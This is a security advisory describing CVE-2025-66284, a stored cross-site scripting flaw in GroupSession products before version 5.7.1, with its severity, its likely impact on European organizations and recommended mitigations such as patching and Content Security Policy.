CVE-2025-66284 is a stored cross-site scripting (XSS) vulnerability identified in Japan Total System Co., Ltd.'s GroupSession Free edition, GroupSession byCloud, and GroupSession ZION products prior to version 5.7.1. The vulnerability allows an authenticated user to inject malicious JavaScript code into the application by preparing a malicious page or URL. When other users access the injected content, the malicious script executes in their browsers, potentially leading to session hijacking, theft of sensitive information, or unauthorized actions performed on behalf of the victim user. The vulnerability requires the attacker to be logged in (privileged access) and user interaction (victim must access the malicious content). The CVSS 3.0 base score of 5.4 reflects a medium severity, with an attack vector of network, low attack complexity, privileges required, and user interaction needed. The vulnerability impacts confidentiality and integrity but does not affect availability. No known exploits are reported in the wild as of the publication date. The vulnerability affects multiple GroupSession product editions, all prior to version 5.7.1, indicating that upgrading to this or later versions is critical for remediation. The vulnerability was published on December 12, 2025, and assigned by JPCERT, indicating a credible and authoritative source.

For European organizations using GroupSession products, this vulnerability poses a risk to the confidentiality and integrity of user data and sessions. Exploitation could allow attackers to steal session cookies, enabling impersonation of legitimate users, or execute unauthorized actions within the application context. This could lead to data leakage, unauthorized access to sensitive information, and potential lateral movement within the network if GroupSession is integrated with other internal systems. Although availability is not directly impacted, the indirect consequences of compromised accounts could disrupt business operations. The requirement for authenticated access and user interaction limits the attack surface but does not eliminate risk, especially in environments with many users or where social engineering could be employed. Organizations handling sensitive or regulated data (e.g., GDPR-protected personal data) must consider the compliance implications of such a vulnerability.

1. Upgrade all affected GroupSession products to version 5.7.1 or later immediately to apply the official patch addressing this XSS vulnerability. 2. Implement strict input validation and output encoding on all user-supplied data to prevent injection of malicious scripts. 3. Deploy Content Security Policy (CSP) headers to restrict the execution of unauthorized scripts in browsers. 4. Conduct user awareness training to reduce the risk of users clicking on suspicious links or pages within the application. 5. Monitor application logs and user activity for unusual behavior indicative of exploitation attempts. 6. Where possible, restrict privileges of users to the minimum necessary to reduce the risk posed by authenticated attackers. 7. Consider implementing web application firewalls (WAF) with rules to detect and block XSS attack patterns targeting GroupSession endpoints. 8. Regularly review and update security configurations and perform security testing to detect similar vulnerabilities proactively.